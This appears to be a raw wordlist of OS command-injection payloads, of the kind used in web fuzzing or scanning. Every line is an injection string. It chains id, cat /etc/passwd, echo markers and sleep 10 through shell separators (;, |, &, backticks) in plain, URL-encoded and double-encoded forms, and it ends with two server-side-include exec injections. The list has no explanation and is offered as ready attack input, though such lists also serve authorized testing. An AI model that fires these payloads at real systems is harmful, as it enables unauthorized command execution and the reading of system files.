test
id
3333333333333333333%7cecho%20m7pl2eqk1g%20qqbr32n6ib%7c%7ca%20%23'%20%7cecho%20m7pl2eqk1g%20qqbr32n6ib%7c%7ca%20%23%7c%22%20%7cecho%20m7pl2eqk1g%20qqbr32n6ib%7c%7ca%20%23
cat /etc/passwd
echo gaw4f4sdaf12f
;id
;cat /etc/passwd
;echo gaw4f4sdaf12f
%3Becho gaw4f4sdaf12f
%253Becho gaw4f4sdaf12f
|echo gaw4f4sdaf12f
%7Cecho gaw4f4sdaf12f
%257Cecho gaw4f4sdaf12f
||echo gaw4f4sdaf12f
%7C%7Cecho gaw4f4sdaf12f
%257C%257Cecho gaw4f4sdaf12f
&echo gaw4f4sdaf12f
%26echo gaw4f4sdaf12f
%2526echo gaw4f4sdaf12f
&&echo gaw4f4sdaf12f
%26%26echo gaw4f4sdaf12f
%2526%2526echo gaw4f4sdaf12f
`echo gaw4f4sdaf12f`
%60echo gaw4f4sdaf12f%60
%2560echo gaw4f4sdaf12f%2560
;sleep 10
%3Bsleep 10
%253Bsleep 10
|sleep 10
%7Csleep 10
%257Csleep 10
||sleep 10
%7C%7Csleep 10
%257C%257Csleep 10
&sleep 10
%26sleep 10
%2526sleep 10
&&sleep 10
%26%26sleep 10
%2526%2526sleep 10
`sleep 10`
%60sleep 10%60
%2560sleep 10%2560
<!--#exec cmd="echo gaw4f4sdaf12f" -->
<!--#exec cmd="sleep 10" -->
